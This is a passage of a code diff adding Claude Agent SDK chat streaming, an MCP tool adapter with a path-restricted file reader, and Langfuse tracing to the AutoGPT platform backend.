+    # Construct the project directory path (known-safe home expansion)
+    claude_projects = os.path.normpath(os.path.expanduser("~/.claude/projects"))
+    project_dir = os.path.normpath(os.path.join(claude_projects, encoded_cwd))
+
+    # Security check 3: project_dir must be a child of ~/.claude/projects.
+    # Compare against the prefix plus a separator so that a sibling such as
+    # "~/.claude/projects-other" cannot satisfy the startswith test.
+    if not project_dir.startswith(claude_projects + os.sep):
+        logger.warning(
+            f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
+        )
+        return
+
+    results_dir = os.path.join(project_dir, "tool-results")
+    if os.path.isdir(results_dir):
+        for filename in os.listdir(results_dir):
+            file_path = os.path.join(results_dir, filename)
+            try:
+                if os.path.isfile(file_path):
+                    os.remove(file_path)
+            except OSError as e:
+                logger.debug(f"[SDK] Could not remove {file_path}: {e}")
+
+    # Also clean up the temp cwd directory itself; ignore_errors=True already
+    # suppresses failures, so no surrounding try/except is needed.
+    shutil.rmtree(normalized, ignore_errors=True)
+
+
+async def _compress_conversation_history(
+    session: ChatSession,
+) -> list[ChatMessage]:
+    """Compress the conversation history that precedes the current message.
+
+    "Prior" means every session message except the last one, which is treated
+    as the current message. The shared compress_context() from prompt.py is
+    first called with an OpenAI-compatible client; if that attempt raises, it
+    is retried with ``client=None`` (truncation-only, no LLM summarization).
+
+    Returns the prior messages unchanged when there are fewer than two of them
+    or nothing was compacted; otherwise the compacted messages as ChatMessages.
+    """
+    prior = session.messages[:-1]
+    if len(prior) < 2:
+        return prior
+
+    from backend.util.prompt import compress_context
+
+    # compress_context takes plain dicts; optional fields are kept only if truthy
+    def _as_dict(msg: ChatMessage) -> dict[str, Any]:
+        optional = {
+            "content": msg.content,
+            "tool_calls": msg.tool_calls,
+            "tool_call_id": msg.tool_call_id,
+        }
+        return {"role": msg.role, **{k: v for k, v in optional.items() if v}}
+
+    messages_dict = [_as_dict(msg) for msg in prior]
+
+    try:
+        import openai
+
+        async with openai.AsyncOpenAI(
+            api_key=config.api_key, base_url=config.base_url, timeout=30.0
+        ) as client:
+            result = await compress_context(
+                messages=messages_dict,
+                model=config.model,
+                client=client,
+            )
+    except Exception as e:
+        logger.warning(f"[SDK] Context compression with LLM failed: {e}")
+        # Fall back to truncation-only (no LLM summarization)
+        result = await compress_context(
+            messages=messages_dict,
+            model=config.model,
+            client=None,
+        )
+
+    if not result.was_compacted:
+        return prior
+
+    logger.info(
+        f"[SDK] Context compacted: {result.original_token_count} -> "
+        f"{result.token_count} tokens "
+        f"({result.messages_summarized} summarized, "
+        f"{result.messages_dropped} dropped)"
+    )
+    # Convert compressed dicts back to ChatMessages
+    return [
+        ChatMessage(
+            role=m["role"],
+            content=m.get("content"),
+            tool_calls=m.get("tool_calls"),
+            tool_call_id=m.get("tool_call_id"),
+        )
+        for m in result.messages
+    ]
+
+
+def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
+    """Render user/assistant turns as a ``<conversation_history>`` text block.
+
+    Each message with non-empty content becomes one line, in order:
+        User: hello                          (role == "user")
+        You responded: Hi! How can I help?   (role == "assistant")
+    Messages with any other role (e.g. tool output) are left out, and the
+    lines are wrapped in <conversation_history> ... </conversation_history>.
+
+    Returns None when no line was produced, including for an empty list.
+    """
+    if not messages:
+        return None
+
+    # Only these two roles are rendered; anything else (tool messages) is skipped.
+    speaker_prefix = {"user": "User: ", "assistant": "You responded: "}
+
+    rendered = [
+        f"{speaker_prefix[msg.role]}{msg.content}"
+        for msg in messages
+        if msg.content and msg.role in speaker_prefix
+    ]
+    if not rendered:
+        return None
+
+    # Wrap the lines in the history tags, one element per line.
+    opening, closing = "<conversation_history>", "</conversation_history>"
+    return "\n".join([opening, *rendered, closing])
+
+
+async def stream_chat_completion_sdk(
+    session_id: str,
+    message: str | None = None,
+    tool_call_response: str | None = None,  # noqa: ARG001
+    is_user_message: bool = True,
+    user_id: str | None = None,
+    retry_count: int = 0,  # noqa: ARG001
+    session: ChatSession | None = None,
+    context: dict[str, str] | None = None,  # noqa: ARG001
+) -> AsyncGenerator[StreamBaseResponse, None]:
+    """Stream a chat turn via the Claude Agent SDK (stream_chat_completion drop-in).
+
+    Raises NotFoundError for a missing session; SDK-run errors yield StreamError.
+    """
+
+    if session is None:
+        session = await get_chat_session(session_id, user_id)
+
+    if not session:
+        raise NotFoundError(
+            f"Session {session_id} not found. Please create a new session first."
+        )
+
+    if message:
+        session.messages.append(
+            ChatMessage(
+                role="user" if is_user_message else "assistant", content=message
+            )
+        )
+        if is_user_message:
+            track_user_message(
+                user_id=user_id, session_id=session_id, message_length=len(message)
+            )
+
+    session = await upsert_chat_session(session)
+
+    # Generate title for new sessions (first user message)
+    if is_user_message and not session.title:
+        user_messages = [m for m in session.messages if m.role == "user"]
+        if len(user_messages) == 1:
+            first_message = user_messages[0].content or message or ""
+            if first_message:
+                task = asyncio.create_task(
+                    _update_title_async(session_id, first_message, user_id)
+                )
+                _background_tasks.add(task)
+                task.add_done_callback(_background_tasks.discard)
+
+    # Build system prompt (reuses non-SDK path with Langfuse support)
+    has_history = len(session.messages) > 1
+    system_prompt, _ = await _build_system_prompt(
+        user_id, has_conversation_history=has_history
+    )
+    system_prompt += _SDK_TOOL_SUPPLEMENT
+    message_id = str(uuid.uuid4())
+    text_block_id = str(uuid.uuid4())
+    task_id = str(uuid.uuid4())
+
+    yield StreamStart(messageId=message_id, taskId=task_id)
+
+    stream_completed = False
+    # Session-specific temp dir, so cleanup never touches another session's files.
+    # NOTE(review): outside the try below — a ValueError here skips StreamError.
+    sdk_cwd = _make_sdk_cwd(session_id)
+    os.makedirs(sdk_cwd, exist_ok=True)
+
+    set_execution_context(user_id, session, None)  # context read by tool calls
+
+    try:
+        try:
+            from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
+
+            mcp_server = create_copilot_mcp_server()
+
+            sdk_model = _resolve_sdk_model()
+
+            # Initialize Langfuse tracing (no-op if not configured)
+            tracer = TracedSession(session_id, user_id, system_prompt, model=sdk_model)
+
+            # Merge security hooks with optional tracing hooks
+            security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
+            tracing_hooks = create_tracing_hooks(tracer)
+            combined_hooks = merge_hooks(security_hooks, tracing_hooks)
+
+            options = ClaudeAgentOptions(
+                system_prompt=system_prompt,
+                mcp_servers={"copilot": mcp_server},  # type: ignore[arg-type]
+                allowed_tools=COPILOT_TOOL_NAMES,
+                hooks=combined_hooks,  # type: ignore[arg-type]
+                cwd=sdk_cwd,
+                max_buffer_size=config.claude_agent_max_buffer_size,
+                model=sdk_model,
+                env=_build_sdk_env(),
+                user=user_id or None,
+                max_budget_usd=config.claude_agent_max_budget_usd,
+            )
+
+            adapter = SDKResponseAdapter(message_id=message_id)
+            adapter.set_task_id(task_id)
+
+            async with tracer, ClaudeSDKClient(options=options) as client:
+                current_message = message or ""
+                if not current_message and session.messages:
+                    last_user = [m for m in session.messages if m.role == "user"]
+                    if last_user:
+                        current_message = last_user[-1].content or ""
+
+                if not current_message.strip():
+                    yield StreamError(
+                        errorText="Message cannot be empty.",
+                        code="empty_prompt",
+                    )
+                    yield StreamFinish()
+                    return  # the outer finally still removes sdk_cwd
+
+                # Build query with conversation history context.
+                # Compress history first to handle long conversations.
+                query_message = current_message
+                if len(session.messages) > 1:
+                    compressed = await _compress_conversation_history(session)
+                    history_context = _format_conversation_context(compressed)
+                    if history_context:
+                        query_message = (
+                            f"{history_context}\n\n"
+                            f"Now, the user says:\n{current_message}"
+                        )
+
+                logger.info(
+                    f"[SDK] Sending query: {current_message[:80]!r}"
+                    f" ({len(session.messages)} msgs in session)"
+                )
+                tracer.log_user_message(current_message)
+                await client.query(query_message, session_id=session_id)
+
+                assistant_response = ChatMessage(role="assistant", content="")
+                accumulated_tool_calls: list[dict[str, Any]] = []
+                has_appended_assistant = False
+                has_tool_results = False
+
+                async for sdk_msg in client.receive_messages():
+                    logger.debug(
+                        f"[SDK] Received: {type(sdk_msg).__name__} "
+                        f"{getattr(sdk_msg, 'subtype', '')}"
+                    )
+                    tracer.log_sdk_message(sdk_msg)
+                    for response in adapter.convert_message(sdk_msg):
+                        if isinstance(response, StreamStart):
+                            continue  # StreamStart was already yielded above
+                        yield response
+
+                        if isinstance(response, StreamTextDelta):
+                            delta = response.delta or ""
+                            # After tool results, start a new assistant
+                            # message for the post-tool text.
+                            if has_tool_results and has_appended_assistant:
+                                assistant_response = ChatMessage(
+                                    role="assistant", content=delta
+                                )
+                                accumulated_tool_calls = []
+                                has_appended_assistant = False
+                                has_tool_results = False
+                                session.messages.append(assistant_response)
+                                has_appended_assistant = True
+                            else:
+                                assistant_response.content = (
+                                    assistant_response.content or ""
+                                ) + delta
+                                if not has_appended_assistant:
+                                    session.messages.append(assistant_response)
+                                    has_appended_assistant = True
+
+                        elif isinstance(response, StreamToolInputAvailable):
+                            accumulated_tool_calls.append(
+                                {
+                                    "id": response.toolCallId,
+                                    "type": "function",
+                                    "function": {
+                                        "name": response.toolName,
+                                        "arguments": json.dumps(response.input or {}),
+                                    },
+                                }
+                            )
+                            assistant_response.tool_calls = accumulated_tool_calls
+                            if not has_appended_assistant:
+                                session.messages.append(assistant_response)
+                                has_appended_assistant = True
+
+                        elif isinstance(response, StreamToolOutputAvailable):
+                            session.messages.append(
+                                ChatMessage(
+                                    role="tool",
+                                    content=(
+                                        response.output
+                                        if isinstance(response.output, str)
+                                        else str(response.output)
+                                    ),
+                                    tool_call_id=response.toolCallId,
+                                )
+                            )
+                            has_tool_results = True
+
+                        elif isinstance(response, StreamUsage):
+                            session.usage.append(
+                                Usage(
+                                    prompt_tokens=response.promptTokens,
+                                    completion_tokens=response.completionTokens,
+                                    total_tokens=response.totalTokens,
+                                )
+                            )
+
+                        elif isinstance(response, StreamFinish):
+                            stream_completed = True
+
+                    if stream_completed:
+                        break  # a StreamFinish was produced; stop reading SDK messages
+
+                if (
+                    assistant_response.content or assistant_response.tool_calls
+                ) and not has_appended_assistant:
+                    session.messages.append(assistant_response)
+
+        except ImportError:
+            logger.warning(
+                "[SDK] claude-agent-sdk not available, using Anthropic fallback"
+            )
+            async for response in stream_with_anthropic(
+                session, system_prompt, text_block_id
+            ):
+                if isinstance(response, StreamFinish):
+                    stream_completed = True
+                yield response
+
+        await upsert_chat_session(session)
+        logger.debug(
+            f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
+        )
+        if not stream_completed:
+            yield StreamFinish()
+
+    except Exception as e:
+        logger.error(f"[SDK] Error: {e}", exc_info=True)
+        try:
+            await upsert_chat_session(session)
+        except Exception as save_err:
+            logger.error(f"[SDK] Failed to save session on error: {save_err}")
+        yield StreamError(
+            errorText="An error occurred. Please try again.",
+            code="sdk_error",
+        )
+        yield StreamFinish()
+    finally:
+        _cleanup_sdk_tool_results(sdk_cwd)
+
+
+async def _update_title_async(
+    session_id: str, message: str, user_id: str | None = None
+) -> None:
+    """Generate and store a session title; ordinary exceptions are only logged."""
+    try:
+        title_context = {"user_id": user_id, "session_id": session_id}
+        title = await _generate_session_title(message, **title_context)
+        if not title:
+            return
+        await update_session_title(session_id, title)
+        logger.debug(f"[SDK] Generated title for {session_id}: {title}")
+    except Exception as e:
+        logger.warning(f"[SDK] Failed to update session title: {e}")
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/tool_adapter.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/tool_adapter.py
@@ -0,0 +1,321 @@
+"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
+
+This module provides the adapter layer that converts existing BaseTool implementations
+into in-process MCP tools that can be used with the Claude Agent SDK.
+"""
+
+import json
+import logging
+import os
+import uuid
+from contextvars import ContextVar
+from typing import Any
+
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools import TOOL_REGISTRY
+from backend.api.features.chat.tools.base import BaseTool
+
+logger = logging.getLogger(__name__)
+
+# Allowed base directory for the Read tool (SDK saves oversized tool results here)
+_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
+
+# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
+MCP_SERVER_NAME = "copilot"
+MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
+
+# Context variables to pass user/session info to tool execution
+_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
+_current_session: ContextVar[ChatSession | None] = ContextVar(
+    "current_session", default=None
+)
+_current_tool_call_id: ContextVar[str | None] = ContextVar(
+    "current_tool_call_id", default=None
+)
+
+# Stash of full MCP tool outputs, captured before the SDK potentially truncates them.
+# Keyed by tool_name → output string, so a repeat call to the same tool overwrites any
+# entry not yet consumed (popped) by the response adapter for StreamToolOutputAvailable.
+_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
+    "pending_tool_outputs", default=None  # type: ignore[arg-type]
+)
+
+
+def set_execution_context(
+    user_id: str | None,
+    session: ChatSession,
+    tool_call_id: str | None = None,
+) -> None:
+    """Bind the user, session and tool-call id that tool handlers will read.
+
+    Call this before streaming begins: handlers fetch these context variables
+    via ``get_execution_context``. The pending-output stash is reset to ``{}``.
+    """
+    _pending_tool_outputs.set({})
+    _current_tool_call_id.set(tool_call_id)
+    _current_session.set(session)
+    _current_user_id.set(user_id)
+
+
+def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
+    """Return ``(user_id, session, tool_call_id)`` from the context variables."""
+    user_id = _current_user_id.get()
+    session = _current_session.get()
+    tool_call_id = _current_tool_call_id.get()
+    # Each value falls back to None when its context variable was never set.
+    return user_id, session, tool_call_id
+
+
+def pop_pending_tool_output(tool_name: str) -> str | None:
+    """Remove and return the full output stashed for *tool_name*, if any.
+
+    Tool handlers stash their untruncated MCP output because the SDK CLI may
+    truncate large tool results (writing them to disk and replacing the
+    content with a file reference). Popping the stash lets the response
+    adapter forward the original output to the frontend for widget rendering.
+
+    Returns:
+        The stashed output string, or ``None`` when no stash exists in this
+        context or nothing was stashed under *tool_name*.
+    """
+    stash = _pending_tool_outputs.get(None)
+    return None if stash is None else stash.pop(tool_name, None)
+
+
+def create_tool_handler(base_tool: BaseTool):
+    """Create an async MCP handler that runs *base_tool* in the current context.
+
+    The handler calls ``base_tool.execute`` with the user/session from the execution
+    context and returns a dict with a text ``content`` list and an ``isError`` flag.
+    """
+
+    async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
+        """Execute the wrapped tool; errors come back as ``isError`` payloads."""
+        user_id, session, tool_call_id = get_execution_context()
+
+        if session is None:
+            return {
+                "content": [
+                    {
+                        "type": "text",
+                        "text": json.dumps(
+                            {
+                                "error": "No session context available",
+                                "type": "error",
+                            }
+                        ),
+                    }
+                ],
+                "isError": True,
+            }
+
+        try:
+            # Call the existing tool's execute method. The context's tool_call_id is
+            # reused when set; otherwise a random "sdk-…" id is generated per call.
+            effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
+            result = await base_tool.execute(
+                user_id=user_id,
+                session=session,
+                tool_call_id=effective_id,
+                **args,
+            )
+
+            # Non-string output is serialized to JSON so the MCP content is always text
+            text = (
+                result.output
+                if isinstance(result.output, str)
+                else json.dumps(result.output)
+            )
+
+            # Stash the full output before the SDK potentially truncates it; keyed by
+            # tool name, so the latest call wins. The response adapter pops it later.
+            pending = _pending_tool_outputs.get(None)
+            if pending is not None:
+                pending[base_tool.name] = text
+
+            return {
+                "content": [{"type": "text", "text": text}],
+                "isError": not result.success,
+            }
+
+        except Exception as e:
+            logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
+            return {
+                "content": [
+                    {
+                        "type": "text",
+                        "text": json.dumps(
+                            {
+                                "error": str(e),
+                                "type": "error",
+                                "message": f"Failed to execute {base_tool.name}",
+                            }
+                        ),
+                    }
+                ],
+                "isError": True,
+            }
+
+    return tool_handler
+
+
+def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
+    """Return an object-typed JSON Schema built from ``base_tool.parameters``."""
+    declared = base_tool.parameters
+    # Missing keys fall back to "no properties" / "nothing required".
+    properties = declared.get("properties", {})
+    required = declared.get("required", [])
+    return {"type": "object", "properties": properties, "required": required}
+
+
+def get_tool_definitions() -> list[dict[str, Any]]:
+    """List every registered CoPilot tool as an MCP-format definition.
+
+    The list can be used with create_sdk_mcp_server or as raw tool definitions.
+
+    Returns:
+        One dict per ``TOOL_REGISTRY`` entry, in registry iteration order, with
+        ``name``, ``description`` and ``inputSchema`` keys.
+    """
+    return [
+        {
+            "name": registered_name,
+            "description": registered_tool.description,
+            "inputSchema": _build_input_schema(registered_tool),
+        }
+        for registered_name, registered_tool in TOOL_REGISTRY.items()
+    ]
+
+
+def get_tool_handlers() -> dict[str, Any]:
+    """Build the name-to-handler lookup for every registered CoPilot tool.
+
+    Returns:
+        A dict mapping each ``TOOL_REGISTRY`` name to the async handler that
+        ``create_tool_handler`` produces for that tool.
+    """
+    return {
+        registered_name: create_tool_handler(registered_tool)
+        for registered_name, registered_tool in TOOL_REGISTRY.items()
+    }
+
+
+async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
+    """Return up to ``limit`` lines of ``file_path``, from 0-indexed line ``offset``.
+
+    Paths must resolve under ``_SDK_TOOL_RESULTS_DIR``; negative offset/limit clamp to 0.
+    """
+    file_path = str(args.get("file_path") or "")
+
+    # Security: resolve symlinks on both sides, then require the "<root>/" prefix
+    real_path = os.path.realpath(file_path)
+    allowed_root = os.path.join(os.path.realpath(_SDK_TOOL_RESULTS_DIR), "")
+    if not real_path.startswith(allowed_root):
+        return {
+            "content": [{"type": "text", "text": f"Access denied: {file_path}"}],
+            "isError": True,
+        }
+
+    try:
+        offset = max(int(args.get("offset", 0)), 0)
+        limit = max(int(args.get("limit", 2000)), 0)
+        with open(real_path) as f:
+            lines = f.readlines()
+        content = "".join(lines[offset : offset + limit])
+        return {"content": [{"type": "text", "text": content}], "isError": False}
+    except FileNotFoundError:
+        return {
+            "content": [{"type": "text", "text": f"File not found: {file_path}"}],
+            "isError": True,
+        }
+    except Exception as e:
+        return {
+            "content": [{"type": "text", "text": f"Error reading file: {e}"}],
+            "isError": True,
+        }
+
+
+_READ_TOOL_NAME = "Read"
+_READ_TOOL_DESCRIPTION = (
+    "Read a file from the local filesystem. "
+    "Use offset and limit to read specific line ranges for large files."
+)
+_READ_TOOL_SCHEMA = {
+    "type": "object",
+    "properties": {
+        "file_path": {
+            "type": "string",
+            "description": "The absolute path to the file to read",
+        },
+        "offset": {
+            "type": "integer",
+            "description": "Line number to start reading from (0-indexed). Default: 0",
+        },
+        "limit": {
+            "type": "integer",
+            "description": "Number of lines to read. Default: 2000",
+        },
+    },
+    "required": ["file_path"],
+}
+
+
+# Create the MCP server configuration
+def create_copilot_mcp_server():
+    """Create an in-process MCP server exposing every CoPilot tool plus ``Read``.
+
+    The result can be passed to ClaudeAgentOptions.mcp_servers.
+
+    Raises:
+        ImportError: if claude-agent-sdk is not installed (the import is local
+            to this function and the error is re-raised unchanged).
+    """
+    try:
+        from claude_agent_sdk import create_sdk_mcp_server, tool
+
+        # Wrap each registered tool's handler with the SDK's ``tool`` decorator
+        sdk_tools = []
+
+        for tool_name, base_tool in TOOL_REGISTRY.items():
+            handler = create_tool_handler(base_tool)
+            decorated = tool(
+                tool_name,
+                base_tool.description,
+                _build_input_schema(base_tool),
+            )(handler)
+            sdk_tools.append(decorated)
+
+        # Add the Read tool so the SDK can read back oversized tool results
+        read_tool = tool(
+            _READ_TOOL_NAME,
+            _READ_TOOL_DESCRIPTION,
+            _READ_TOOL_SCHEMA,
+        )(_read_file_handler)
+        sdk_tools.append(read_tool)
+
+        server = create_sdk_mcp_server(
+            name=MCP_SERVER_NAME,
+            version="1.0.0",
+            tools=sdk_tools,
+        )
+
+        return server
+
+    except ImportError:
+        # Re-raised unchanged so service.py handles the fallback
+        raise
+
+
+# SDK built-in tools allowed within the workspace directory.
+# Security hooks validate that file paths stay within sdk_cwd
+# and that Bash commands are restricted to a safe allowlist.
+_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
+
+# List of tool names for allowed_tools configuration
+# Include MCP tools, the MCP Read tool for oversized results,
+# and SDK built-in file tools for workspace operations.
+COPILOT_TOOL_NAMES = [
+    *[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
+    f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
+    *_SDK_BUILTIN_TOOLS,
+]
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/tracing.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/tracing.py
@@ -0,0 +1,429 @@
+"""Langfuse tracing integration for Claude Agent SDK.
+
+This module provides modular, non-invasive observability for SDK sessions.
+All tracing is opt-in (only active when Langfuse credentials are configured)
+and designed to not affect the core execution flow.
+
+Usage:
+    async with TracedSession(session_id, user_id) as tracer:
+        # Your SDK code here
+        tracer.log_user_message(message)
+        async for sdk_msg in client.receive_messages():
+            tracer.log_sdk_message(sdk_msg)
+        # ResultMessage needs no extra call: log_sdk_message records usage and cost
+"""
+
+from __future__ import annotations
+
+import logging
+import time
+from contextlib import asynccontextmanager
+from dataclasses import dataclass, field
+from typing import TYPE_CHECKING, Any
+
+from backend.util.settings import Settings
+
+if TYPE_CHECKING:
+    from claude_agent_sdk import Message, ResultMessage
+
+logger = logging.getLogger(__name__)
+settings = Settings()
+
+
+def _is_langfuse_configured() -> bool:
+    """Return True only when both Langfuse keys (public and secret) are set."""
+    secrets = settings.secrets
+    # bool(a and b) is True exactly when both values are truthy.
+    return bool(secrets.langfuse_public_key and secrets.langfuse_secret_key)
+
+
+@dataclass
+class ToolSpan:
+    """Timing, input and outcome of one tool call, collected for tracing."""
+
+    tool_call_id: str
+    tool_name: str
+    input: dict[str, Any]
+    start_time: float = field(default_factory=time.perf_counter)  # not wall-clock
+    output: str | None = None
+    success: bool = True  # stays True unless a failure is recorded
+    end_time: float | None = None  # perf_counter reading; None until completion
+
+
+@dataclass
+class GenerationSpan:
+    """Accumulated text, timing and tool calls of one LLM generation, for tracing."""
+
+    text: str = ""
+    start_time: float = field(default_factory=time.perf_counter)  # not wall-clock
+    end_time: float | None = None  # perf_counter reading; None until finalized
+    tool_calls: list[ToolSpan] = field(default_factory=list)
+
+
+class TracedSession:
+    """Context manager for tracing a Claude Agent SDK session with Langfuse.
+
+    Automatically creates a trace with:
+    - Session-level metadata (user_id, session_id)
+    - Generation spans for LLM outputs
+    - Tool call spans with input/output, nested under their generation
+    - Token usage and cost (from ResultMessage)
+
+    If Langfuse is not configured, all methods are no-ops.
+    """
+
+    def __init__(
+        self,
+        session_id: str,
+        user_id: str | None = None,
+        system_prompt: str | None = None,
+        model: str | None = None,
+    ):
+        self.session_id = session_id
+        self.user_id = user_id
+        self.system_prompt = system_prompt
+        self.model = model
+        self.enabled = _is_langfuse_configured()
+
+        # Internal state
+        self._trace: Any = None
+        self._langfuse: Any = None
+        self._user_message: str | None = None
+        self._generations: list[GenerationSpan] = []
+        self._current_generation: GenerationSpan | None = None
+        self._pending_tools: dict[str, ToolSpan] = {}
+        self._start_time: float = 0
+
+    async def __aenter__(self) -> TracedSession:
+        """Start the trace; on any failure tracing is disabled for this session."""
+        if not self.enabled:
+            return self
+
+        try:
+            from langfuse import get_client
+
+            self._langfuse = get_client()
+            self._start_time = time.perf_counter()
+
+            # Root trace. NOTE(review): get_client() looks v3-style, .trace() v2 — confirm
+            self._trace = self._langfuse.trace(
+                name="copilot-sdk-session",
+                session_id=self.session_id,
+                user_id=self.user_id,
+                metadata={
+                    "sdk": "claude-agent-sdk",
+                    "has_system_prompt": bool(self.system_prompt),
+                },
+            )
+            logger.debug(f"[Tracing] Started trace for session {self.session_id}")
+
+        except Exception as e:
+            logger.warning(f"[Tracing] Failed to start trace: {e}")
+            self.enabled = False
+
+        return self
+
+    async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
+        """Finalize open spans and report the collected data to the trace."""
+        if not self.enabled or not self._trace:
+            return
+
+        try:
+            from datetime import datetime, timedelta, timezone
+
+            self._finalize_current_generation()
+            # Langfuse wants datetimes; spans hold perf_counter() values → shift by age
+            wall_now, perf_now = datetime.now(timezone.utc), time.perf_counter()
+
+            def wall(perf: float | None) -> datetime:
+                return wall_now - timedelta(seconds=perf_now - (perf or perf_now))
+
+            # Add generations as spans
+            for gen in self._generations:
+                gen_span = self._trace.span(
+                    name="llm-generation",
+                    start_time=wall(gen.start_time),
+                    end_time=wall(gen.end_time),
+                    output=gen.text[:1000] if gen.text else None,  # Truncate
+                    metadata={"tool_calls": len(gen.tool_calls)},
+                )
+                # Nest each tool call under the generation that issued it
+                for tool in gen.tool_calls:
+                    gen_span.span(
+                        name=f"tool:{tool.tool_name}",
+                        start_time=wall(tool.start_time),
+                        end_time=wall(tool.end_time),
+                        input=tool.input,
+                        output=tool.output[:500] if tool.output else None,
+                        metadata={
+                            "tool_call_id": tool.tool_call_id,
+                            "success": tool.success,
+                        },
+                    )
+
+            # Update trace with final status
+            status = "error" if exc_type else "success"
+            self._trace.update(
+                output=self._generations[-1].text[:500] if self._generations else None,
+                metadata={"status": status, "num_generations": len(self._generations)},
+            )
+
+            # No explicit flush here: delivery is left to the Langfuse client
+            logger.debug(
+                f"[Tracing] Completed trace for session {self.session_id}, "
+                f"{len(self._generations)} generations"
+            )
+
+        except Exception as e:
+            logger.warning(f"[Tracing] Failed to finalize trace: {e}")
+
+    def log_user_message(self, message: str) -> None:
+        """Log the user's input message."""
+        if not self.enabled or not self._trace:
+            return
+
+        self._user_message = message
+        try:
+            self._trace.update(input=message[:1000])
+        except Exception as e:
+            logger.debug(f"[Tracing] Failed to log user message: {e}")
+
+    def log_sdk_message(self, sdk_message: Message) -> None:
+        """Log an SDK message (automatically categorizes by type)."""
+        if not self.enabled:
+            return
+
+        try:
+            from claude_agent_sdk import (
+                AssistantMessage,
+                ResultMessage,
+                TextBlock,
+                ToolResultBlock,
+                ToolUseBlock,
+                UserMessage,
+            )
+
+            if isinstance(sdk_message, AssistantMessage):
+                # Start a new generation if needed
+                if self._current_generation is None:
+                    self._current_generation = GenerationSpan()
+                    self._generations.append(self._current_generation)
+
+                for block in sdk_message.content:
+                    if isinstance(block, TextBlock) and block.text:
+                        self._current_generation.text += block.text
+                    elif isinstance(block, ToolUseBlock):
+                        tool_span = ToolSpan(
+                            tool_call_id=block.id,
+                            tool_name=block.name,
+                            input=block.input or {},
+                        )
+                        self._pending_tools[block.id] = tool_span
+                        self._current_generation.tool_calls.append(tool_span)
+
+            elif isinstance(sdk_message, UserMessage):
+                # UserMessage carries tool results
+                content = sdk_message.content
+                blocks = content if isinstance(content, list) else []
+                for block in blocks:
+                    if isinstance(block, ToolResultBlock) and block.tool_use_id:
+                        tool_span = self._pending_tools.get(block.tool_use_id)
+                        if tool_span:
+                            tool_span.end_time = time.perf_counter()
+                            tool_span.success = not (block.is_error or False)
+                            tool_span.output = self._extract_tool_output(block.content)
+
+                # After tool results, finalize current generation
+                # (SDK will start a new AssistantMessage for continuation)
+                self._finalize_current_generation()
+
+            elif isinstance(sdk_message, ResultMessage):
+                self._log_result(sdk_message)
+
+        except Exception as e:
+            logger.debug(f"[Tracing] Failed to log SDK message: {e}")
+
+    def _log_result(self, result: ResultMessage) -> None:
+        """Log the final result with usage and cost."""
+        if not self.enabled or not self._trace:
+            return
+
+        try:
+            usage = result.usage or {}
+            metadata: dict[str, Any] = {
+                "duration_ms": result.duration_ms,
+                "duration_api_ms": result.duration_api_ms,
+                "num_turns": result.num_turns,
+                "is_error": result.is_error,
+            }
+            if result.total_cost_usd is not None:
+                metadata["cost_usd"] = result.total_cost_usd
+            if usage:
+                metadata["usage"] = usage
+
+            self._trace.update(metadata=metadata)
+
+            # Log as a generation for proper Langfuse cost/usage tracking
+            if usage or result.total_cost_usd:
+                self._trace.generation(
+                    name="claude-sdk-completion",
+                    model=self.model or "claude-sonnet-4-20250514",
+                    usage=(
+                        {
+                            "input": usage.get("input_tokens", 0),
+                            "output": usage.get("output_tokens", 0),
+                            "total": usage.get("input_tokens", 0)
+                            + usage.get("output_tokens", 0),
+                        }
+                        if usage
+                        else None
+                    ),
+                    metadata={"cost_usd": result.total_cost_usd},
+                )
+
+            logger.debug(
+                f"[Tracing] Logged result: {result.num_turns} turns, "
+                f"${result.total_cost_usd:.4f} cost"
+                if result.total_cost_usd
+                else f"[Tracing] Logged result: {result.num_turns} turns"
+            )
+
+        except Exception as e:
+            logger.debug(f"[Tracing] Failed to log result: {e}")
+
+    def _finalize_current_generation(self) -> None:
+        """Mark the current generation as complete."""
+        if self._current_generation:
+            self._current_generation.end_time = time.perf_counter()
+            self._current_generation = None
+
+    @staticmethod
+    def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
+        """Extract string output from tool result content."""
+        if isinstance(content, str):
+            return content
+        if isinstance(content, list):
+            parts = [
+                item.get("text", "") for item in content if item.get("type") == "text"
+            ]
+            return "".join(parts) if parts else str(content)
+        return str(content) if content else ""
+
+
+@asynccontextmanager
+async def traced_session(
+    session_id: str,
+    user_id: str | None = None,
+    system_prompt: str | None = None,
+    model: str | None = None,
+):
+    """Yield a ``TracedSession`` that stays entered for the duration of the block.
+
+    Usage:
+        async with traced_session(session_id, user_id) as tracer:
+            tracer.log_user_message(message)
+            async for msg in client.receive_messages():
+                tracer.log_sdk_message(msg)
+    """
+    session_tracer = TracedSession(session_id, user_id, system_prompt, model=model)
+    async with session_tracer as entered:
+        yield entered
+
+
+def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
+    """Create SDK hooks for fine-grained Langfuse tracing.
+
+    These hooks capture precise timing for tool executions and failures
+    that may not be visible in the message stream. Combine them with security
